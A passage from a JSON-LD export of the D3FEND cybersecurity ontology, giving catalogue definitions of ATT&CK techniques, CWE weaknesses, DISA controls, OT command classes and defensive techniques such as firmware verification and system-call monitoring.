        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20180032728A1/en?oq=US20180032728-A1"
      },
      "d3f:kb-abstract": "The present disclosure relates to a system and method for monitoring system calls to an operating system kernel. A performance monitoring unit is used to monitor system calls and to gather information about each system call. The information is gathered upon interrupting the system call and can include system call type, parameters, and information about the calling thread/process, in order to determine whether the system call was generated by malicious software code. Potentially malicious software code is nullified by a malicious code counter-attack module.",
      "d3f:kb-author": "Matthew D. Spisak",
      "d3f:kb-mitre-analysis": "This patent describes a technique for monitoring system calls to detect malicious software code. A system call monitoring module operates at the kernel level and traps system calls.\nMonitoring data includes:\n\n* information about the path to the file to be accessed by a system call.\n* the memory address or range of addresses to be accessed by a system call.\n* the context for the thread within operating system that will be interrupted by a system call.\n* the type of system call information about the socket that is being used by system call in order to send or receive data.\n* the history of system calls in order to monitor for specific sequences of system calls.\n* the frequency or periodicity of a particular system call or set of systems calls.\n\nCaptured system call data is analyzed using data analysis algorithms such as machine learning algorithms, artificial intelligence algorithms, pattern recognition algorithms, or other known data analysis techniques. An alert is generated if it is likely that the system call was generated by malicious software code.",
      "d3f:kb-organization": "Endgame Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemCallAnalysis"
      },
      "d3f:kb-reference-title": "Hardware-assisted system and method for detecting and analyzing system calls made to an operting system kernel",
      "rdfs:label": "Reference - Hardware-assisted system and method for detecting and analyzing system calls made to an operting system kernel - Endgame Inc"
    },
    {
      "@id": "d3f:CCI-000037_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:UserAccountPermissions"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization implements separation of duties through assigned information system access authorizations.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000037"
    },
    {
      "@id": "d3f:T1070.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1070.002",
      "d3f:definition": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the <code>/var/log/</code> directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)",
      "d3f:modifies": {
        "@id": "d3f:OperatingSystemLogFile"
      },
      "rdfs:label": "Clear Linux or Mac System Logs",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1070"
        },
        {
          "@id": "_:Nc48379296b9541feb57b6f60e4b919f7"
        }
      ]
    },
    {
      "@id": "_:Nc48379296b9541feb57b6f60e4b919f7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemLogFile"
      }
    },
    {
      "@id": "d3f:REC-0001.04",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0001.04",
      "d3f:definition": "Bus intelligence focuses on which protocols are used (e.g., MIL-STD-1553, SpaceWire, etc.), controller roles, addressing, timings, arbitration, redundancy management, and the location of critical endpoints on each segment. Knowing the bus controller, remote terminal addresses, message identifiers, and schedule tables allows an adversary to craft frames that collide with or supersede legitimate traffic, to starve health monitoring, or to trigger latent behaviors in payload or power systems. Additional details such as line voltages, termination, connector types, harness pinouts, and EMC constraints inform feasibility of injection and disruption techniques. Attackers assemble this picture from ICDs, vendor datasheets, AIT procedures, harness drawings, lab photos, and academic or trade publications that reveal typical configurations. Enumeration of bridges and gateways is especially valuable because they concentrate trust across fault-containment regions and between payload and bus.",
      "rdfs:label": "Data Bus - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0001/04/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0001"
      },
      "skos:prefLabel": "Data Bus"
    },
    {
      "@id": "d3f:CWE-549",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-549",
      "d3f:definition": "The product does not mask passwords during entry, increasing the potential for attackers to observe and capture passwords.",
      "rdfs:label": "Missing Password Field Masking",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:CWE-347",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-347",
      "d3f:definition": "The product does not verify, or incorrectly verifies, the cryptographic signature for data.",
      "rdfs:label": "Improper Verification of Cryptographic Signature",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:OTModifyControlProgramCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "OT command that adds, removes, or changes, process data on a remote device.",
      "d3f:modifies": {
        "@id": "d3f:OTControlProgram"
      },
      "rdfs:comment": "GE-SRTP: WRITE PROGRAM BLOCK MEMORY\nGE-SRTP: CHANGE PLC CPU PRIVILEGE LEVEL\nGE-SRTP: SET CONTROL ID(CPU ID)\nGE-SRTP: PROGRAM STORE (UPLOAD FROM PLC)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)\nGE-SRTP: TOGGLE FORCE SYSTEM MEMORY",
      "rdfs:label": "OT Modify Control Program Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceConfigurationCommand"
        },
        {
          "@id": "_:Ndea9dc21123c48f596187f0fbeba1853"
        }
      ]
    },
    {
      "@id": "_:Ndea9dc21123c48f596187f0fbeba1853",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "d3f:CCI-002361_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system automatically terminates a user session after organization-defined conditions or trigger events requiring session disconnect.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ProcessTermination"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-26T00:00:00"
      },
      "rdfs:label": "CCI-002361"
    },
    {
      "@id": "d3f:T0894",
      "@type": "owl:Class",
      "d3f:attack-id": "T0894",
      "d3f:definition": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. (Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands. Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands. (Citation: split man page)(Citation: GTFO split)",
      "rdfs:label": "System Binary Proxy Execution - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSEvasionTechnique"
      },
      "skos:prefLabel": "System Binary Proxy Execution"
    },
    {
      "@id": "d3f:DataAcquisitionAgent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A software component which connects to data sources to gather raw, time-stamped data. It often connects to databases or historian gateways for storage and analysis.",
      "d3f:synonym": "Data Gateway; Historian Collector",
      "rdfs:label": "Data Acquisition Agent",
      "rdfs:seeAlso": {
        "@id": "https://attack.mitre.org/assets/A0009"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:T1051",
      "@type": "owl:Class",
      "d3f:attack-id": "T1051",
      "d3f:definition": "**This technique has been deprecated and should no longer be used.**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated and should no longer be used.**",
      "rdfs:label": "Shared Webroot",
      "rdfs:subClassOf": {
        "@id": "d3f:LateralMovementTechnique"
      }
    },
    {
      "@id": "d3f:MemoryWord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A memory word is the natural unit of data used by a particular computer processor design; a fixed-size piece of data handled as a unit by the instruction set or the hardware of the processor.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Word_(computer_architecture)"
      },
      "rdfs:label": "Memory Word",
      "rdfs:subClassOf": {
        "@id": "d3f:MemoryExtent"
      }
    },
    {
      "@id": "d3f:CWE-560",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-560",
      "d3f:definition": "The product calls umask() with an incorrect argument that is specified as if it is an argument to chmod().",
      "rdfs:label": "Use of umask() with chmod-style Argument",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-687"
      }
    },
    {
      "@id": "d3f:T1651",
      "@type": "owl:Class",
      "d3f:attack-id": "T1651",
      "d3f:definition": "Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)",
      "rdfs:label": "Cloud Administration Command",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:FirmwareVerification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FirmwareVerification"
      ],
      "d3f:d3fend-id": "D3-FV",
      "d3f:definition": "Cryptographically verifying firmware integrity.",
      "d3f:kb-article": "## How it works\nCryptographic hash values are computed for system and peripheral firmware. The hash values are compared against precomputed hash values for the identified firmware. A hash value mismatch may indicate that the firmware may have been tampered with or updated with a non-current release indicating a misconfiguration for the system.\n\n## Considerations\n* Requires cryptographically computed hash values of firmware\n* Requires storage of precomputed firmware hash values",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-FirmwareVerificationEclypsium"
        },
        {
          "@id": "d3f:Reference-FirmwareVerificationTrapezoid"
        },
        {
          "@id": "d3f:Reference-PlatformFirmwareResiliencyGuidelines_NIST"
        }
      ],
      "d3f:verifies": {
        "@id": "d3f:Firmware"
      },
      "rdfs:label": "Firmware Verification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PlatformMonitoring"
        },
        {
          "@id": "_:N6d380e3c918c4c79be8bba5676ca47fa"
        }
      ]
    },
    {
      "@id": "_:N6d380e3c918c4c79be8bba5676ca47fa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:verifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Firmware"
      }
    },
    {
      "@id": "d3f:HardwareComponentInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:HardwareComponentInventory"
      ],
      "d3f:d3fend-id": "D3-HCI",
      "d3f:definition": "Hardware component inventorying identifies and records the hardware items in the organization's architecture.",
      "d3f:inventories": {
        "@id": "d3f:HardwareDevice"
      },
      "d3f:kb-article": "## How it works\nAdministrators collect information on hardware devices such as peripherals, NICs, processors, and memory devices that are components of the computers in their architecture using a variety of administrative and management tools that query for this information.  In some cases, where such queries are not supported or provide specific information of interest, an administrator may also collect this information through remote adminstration tools and system commands, either manually or using scripts.\n\n## Considerations\n* Scanning and probing techniques using mapping tools can result in side effects to information technology (IT) and operational technology (OT) systems.\n* An adversary conducting network enumeration may engage in activities that parallel normal hardware inventorying activities, but would require escalating to admin privileges for most of the operations requiting administrative tools\n\n## Examples\n* Bus discovery\n   * Admin-scripted PCI Bus inventory using ssh and pciutils\n* Application-layer discovery\n   * Simple Network Management Protocol (SNMP) collects MIB information\n   * Web-based Enterprise Management (WBEM) collects CIM information\n      * Windows Management Instrumentation (WMI)\n      * Windows Management Infrastructure (MI)",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-AdvancedDeviceMatchingSystem"
      },
      "d3f:synonym": [
        "Hardware Component Discovery",
        "Hardware Component Inventorying"
      ],
      "rdfs:label": "Hardware Component Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:Naf7757edbec943d78848196d16f9a2d1"
        }
      ]
    },
    {
      "@id": "_:Naf7757edbec943d78848196d16f9a2d1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:CWE-1333",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1333",
      "d3f:definition": "The product uses a regular expression with an inefficient, possibly exponential worst-case computational complexity that consumes excessive CPU cycles.",
      "d3f:synonym": [
        "Catastrophic backtracking",
        "ReDoS",
        "Regular Expression Denial of Service"
      ],
      "rdfs:label": "Inefficient Regular Expression Complexity",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-407"
      }
    },
    {
      "@id": "d3f:Shim",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer programming, a shim is a small library that transparently intercepts API calls and changes the arguments passed, handles the operation itself, or redirects the operation elsewhere. Shims can be used to support an old API in a newer environment, or a new API in an older environment. Shims can also be used for running programs on different software platforms than those for which they were developed.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Shim_(computing)"
      },
      "rdfs:label": "Shim",
      "rdfs:subClassOf": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:KernelModule",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A loadable kernel module (LKM) is an object file that contains code to extend the running kernel, or so-called base kernel, of an operating system. LKMs are typically used to add support for new hardware (as device drivers) and/or filesystems, or for adding system calls. When the functionality provided by a LKM is no longer required, it can be unloaded in order to free memory and other resources.\n\nMost current Unix-like systems and Microsoft Windows support loadable kernel modules, although they might use a different name for them, such as kernel loadable module (kld) in FreeBSD, kernel extension (kext) in macOS,[1] kernel extension module in AIX, kernel-mode driver in Windows NT[2] and downloadable kernel module (DKM) in VxWorks. They are also known as kernel loadable modules (or KLM), and simply as kernel modules (KMOD).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Loadable_kernel_module"
      },
      "rdfs:label": "Kernel Module",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/kernel_driver"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ObjectFile"
      },
      "skos:altLabel": [
        "LKM",
        "Loadable Kernel Module"
      ]
    },
    {
      "@id": "d3f:TrustedUserAttacker",
      "@type": "owl:Class",
      "d3f:definition": "A trusted attacker who abuses regular user-level access privileges to compromise systems or data.",
      "rdfs:label": "Trusted User Attacker",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:TrustedAttacker"
        },
        {
          "@id": "_:Nef54cfed857948a4b40e0374daf59c60"
        },
        {
          "@id": "_:N69c01c3b080e4871b4fb20e950843d3a"
        },
        {
          "@id": "_:Nfb2216c5cd5d49ac846d993d2e59101d"
        }
      ]
    },
    {
      "@id": "_:Nef54cfed857948a4b40e0374daf59c60",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefaultUserAccount"
      }
    },
    {
      "@id": "_:N69c01c3b080e4871b4fb20e950843d3a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "_:Nfb2216c5cd5d49ac846d993d2e59101d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:T1137.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1137.001",
      "d3f:definition": "Adversaries may abuse Microsoft Office templates to obtain persistence on a compromised system. Microsoft Office contains templates that are part of common Office applications and are used to customize styles. The base templates within the application are used each time an application starts. (Citation: Microsoft Change Normal Template)",
      "d3f:may-add": {
        "@id": "d3f:ExecutableScript"
      },
      "d3f:may-modify": [
        {
          "@id": "d3f:ExecutableScript"
        },
        {
          "@id": "d3f:SystemConfigurationDatabaseRecord"
        }
      ],
      "rdfs:label": "Office Template Macros",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1137"
        },
        {
          "@id": "_:Ncea8479394384d349ef6ca68c7a938e8"
        },
        {
          "@id": "_:N0a6819a60c6b467d9fbeba431e0d043d"
        },
        {
          "@id": "_:Nd2ba6f71c1f747b2ad1dac1b3fcfcb9a"
        }
      ]
    },
    {
      "@id": "_:Ncea8479394384d349ef6ca68c7a938e8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-add"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:N0a6819a60c6b467d9fbeba431e0d043d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "_:Nd2ba6f71c1f747b2ad1dac1b3fcfcb9a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:CWE-53",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-53",
      "d3f:definition": "The product accepts path input in the form of multiple internal backslash ('\\multiple\\trailing\\\\slash') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: '\\multiple\\\\internal\\backslash'",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-165"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:T1564",
      "@type": "owl:Class",
      "d3f:attack-id": "T1564",
      "d3f:definition": "Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)",
      "rdfs:label": "Hide Artifacts",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:Storage",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Computer data storage, often called storage or memory, is a technology consisting of computer components and recording media used to retain digital data. It is a core function and fundamental component of computers. In the Von Neumann architecture, the CPU consists of two main parts: The control unit and the arithmetic / logic unit (ALU). The former controls the flow of data between the CPU and memory, while the latter performs arithmetic and logical operations on data.",
      "d3f:may-contain": {
        "@id": "d3f:FileSystem"
      },
      "d3f:synonym": [
        "Computer data storage",
        "Memory"
      ],
      "rdfs:isDefinedBy": {
        "@id": "dbr:Computer_data_storage"
      },
      "rdfs:label": "Storage",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N59e4ce305ec741a09cc1631bb5d9a96c"
        }
      ]
    },
    {
      "@id": "_:N59e4ce305ec741a09cc1631bb5d9a96c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystem"
      }
    },
    {
      "@id": "d3f:EndpointSensor",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A sensor application installed on a endpoint (platform) to collect information on platform components.",
      "rdfs:label": "Endpoint Sensor",
      "rdfs:seeAlso": {
        "@id": "d3f:ComputerPlatform"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:CyberSensor"
      }
    },
    {
      "@id": "d3f:T1102",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1102",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetWebTraffic"
      },
      "rdfs:label": "Web Service",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "_:N755ad6b10d7e42d89eb83073f5aa3335"
        }
      ]
    },
    {
      "@id": "_:N755ad6b10d7e42d89eb83073f5aa3335",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetWebTraffic"
      }
    },
    {
      "@id": "d3f:CWE-59",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-59",
      "d3f:definition": "The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.",
      "d3f:synonym": [
        "Zip Slip",
        "insecure temporary file"
      ],
      "rdfs:label": "Improper Link Resolution Before File Access ('Link Following')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-706"
      }
    },
    {
      "@id": "d3f:produces",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x produces y: The subject entity x or process produces a data object y, which may be discrete digital object or a stream (e.g., a stream such as network traffic.)",
      "rdfs:isDefinedBy": {
        "@id": "http://wordnet-rdf.princeton.edu/id/01625832-v"
      },
      "rdfs:label": "produces",
      "rdfs:seeAlso": {
        "@id": "d3f:creates"
      },
      "rdfs:subPropertyOf": [
        {
          "@id": "d3f:associated-with"
        },
        {
          "@id": "d3f:may-produce"
        }
      ],
      "skos:altLabel": "outputs"
    },
    {
      "@id": "d3f:CCI-001855_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides a warning to organization-defined personnel, roles, and/or locations within an organization-defined time period when allocated audit record storage volume reaches an organization-defined percentage of repository maximum audit record storage capacity.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-03-14T00:00:00"
      },
      "rdfs:label": "CCI-001855"
    },
    {
      "@id": "d3f:CWE-333",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-333",
      "d3f:definition": "True random number generators (TRNG) generally have a limited source of entropy and therefore can fail or block.",
      "rdfs:label": "Improper Handling of Insufficient Entropy in TRNG",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-331"
        },
        {
          "@id": "d3f:CWE-703"
        },
        {
          "@id": "d3f:CWE-755"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1357",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1357",
      "d3f:definition": "The product is built from multiple separate components, but it uses a component that is not sufficiently trusted to meet expectations for security, reliability, updateability, and maintainability.",
      "rdfs:label": "Reliance on Insufficiently Trustworthy Component",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CWE-187",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-187",
      "d3f:definition": "The product performs a comparison that only examines a portion of a factor before determining whether there is a match, such as a substring, leading to resultant weaknesses.",
      "rdfs:label": "Partial String Comparison",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1023"
      }
    },
    {
      "@id": "d3f:ScheduledJobDeletionEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event marking the removal of a scheduled task from the system, terminating its execution schedule.",
      "rdfs:label": "Scheduled Job Deletion Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ScheduledJobEvent"
        },
        {
          "@id": "_:N591ca7fb19ee4e319913028c2e581e76"
        }
      ]
    },
    {
      "@id": "_:N591ca7fb19ee4e319913028c2e581e76",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ScheduledJobCreationEvent"
      }
    },
    {
      "@id": "d3f:Host",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:Application"
      },
      "d3f:definition": "A host is a computer or other device, typically connected to a computer network. A network host may offer information resources, services, and applications to users or other nodes on the network. A network host is a network node that is assigned a network layer host address. Network hosts that participate in applications that use the client-server model of computing, are classified as server or client systems. Network hosts may also function as nodes in peer-to-peer applications, in which all nodes share and consume resources in an equipotent manner.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Host_(network)"
      },
      "rdfs:label": "Host",
      "rdfs:seeAlso": [
        {
          "@id": "https://schema.ocsf.io/objects/device"
        },
        {
          "@id": "https://schema.ocsf.io/objects/endpoint"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputerNetworkNode"
        },
        {
          "@id": "_:N6f411775a8964c86aedf76bf4bb3b344"
        }
      ],
      "skos:altLabel": "Network Host"
    },
    {
      "@id": "_:N6f411775a8964c86aedf76bf4bb3b344",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:Reference-SMBWriteRequest-NamedPipes_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2014-03-001/"
      },
      "d3f:kb-abstract": "An SMB write can be an indicator of lateral movement, especially when combined with other information such as execution of that written file. Named pipes are a subset of SMB write requests. Named pipes such as msftewds may not be alarming; however others, such as lsarpc, may.\n\nMonitoring SMB write requests still creates some noise, particularly with named pipes. As a result, SMB is now split between writing named pipes and writing other files.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:IPCTrafficAnalysis"
        },
        {
          "@id": "d3f:RPCTrafficAnalysis"
        }
      ],
      "d3f:kb-reference-title": "CAR-2014-03-001: SMB Write Request - NamedPipes",
      "rdfs:label": "Reference - CAR-2014-03-001: SMB Write Request - NamedPipes - MITRE"
    },
    {
      "@id": "d3f:CWE-370",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-370",
      "d3f:definition": "The product does not check the revocation status of a certificate after its initial revocation check, which can cause the product to perform privileged actions even after the certificate is revoked at a later time.",
      "rdfs:label": "Missing Check for Certificate Revocation after Initial Check",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-299"
      }
    },
    {
      "@id": "d3f:CWE-1321",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1321",
      "d3f:definition": "The product receives input from an upstream component that specifies attributes that are to be initialized or updated in an object, but it does not properly control modifications of attributes of the object prototype.",
      "rdfs:label": "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-915"
      }
    },
    {
      "@id": "d3f:CWE-1256",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1256",
      "d3f:definition": "The product provides software-controllable device functionality for capabilities such as power and clock management, but it does not properly limit functionality that can lead to modification of hardware memory or register bits, or the ability to observe physical side channels.",
      "rdfs:label": "Improper Restriction of Software Interfaces to Hardware Features",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:PersonalComputer",
      "@type": "owl:Class",
      "d3f:definition": "A personal computer (PC) is a multi-purpose computer whose size, capabilities, and price make it feasible for individual use. Personal computers are intended to be operated directly by an end user, rather than by a computer expert or technician. Unlike large, costly minicomputers and mainframes, time-sharing by many people at the same time is not used with personal computers. PCs have in practice become powerful enough that they may be shared by multiple users at any given time, though this is not common practice nor the primary purpose of a PC.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Personal_computer"
      },
      "rdfs:label": "Personal Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:ClientComputer"
      }
    },
    {
      "@id": "d3f:OTDeviceConfigurationCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Configure or administer managed devices.",
      "rdfs:label": "OT Device Configuration Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceManagementMessageEvent"
        },
        {
          "@id": "_:Nea99252f69054bf99ec503e80007ba27"
        }
      ]
    },
    {
      "@id": "_:Nea99252f69054bf99ec503e80007ba27",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:ExternalKnowledgeBase",
      "@type": "owl:Class",
      "d3f:pref-label": "External Knowledge Base",
      "rdfs:label": "External Knowledge Base",
      "rdfs:subClassOf": {
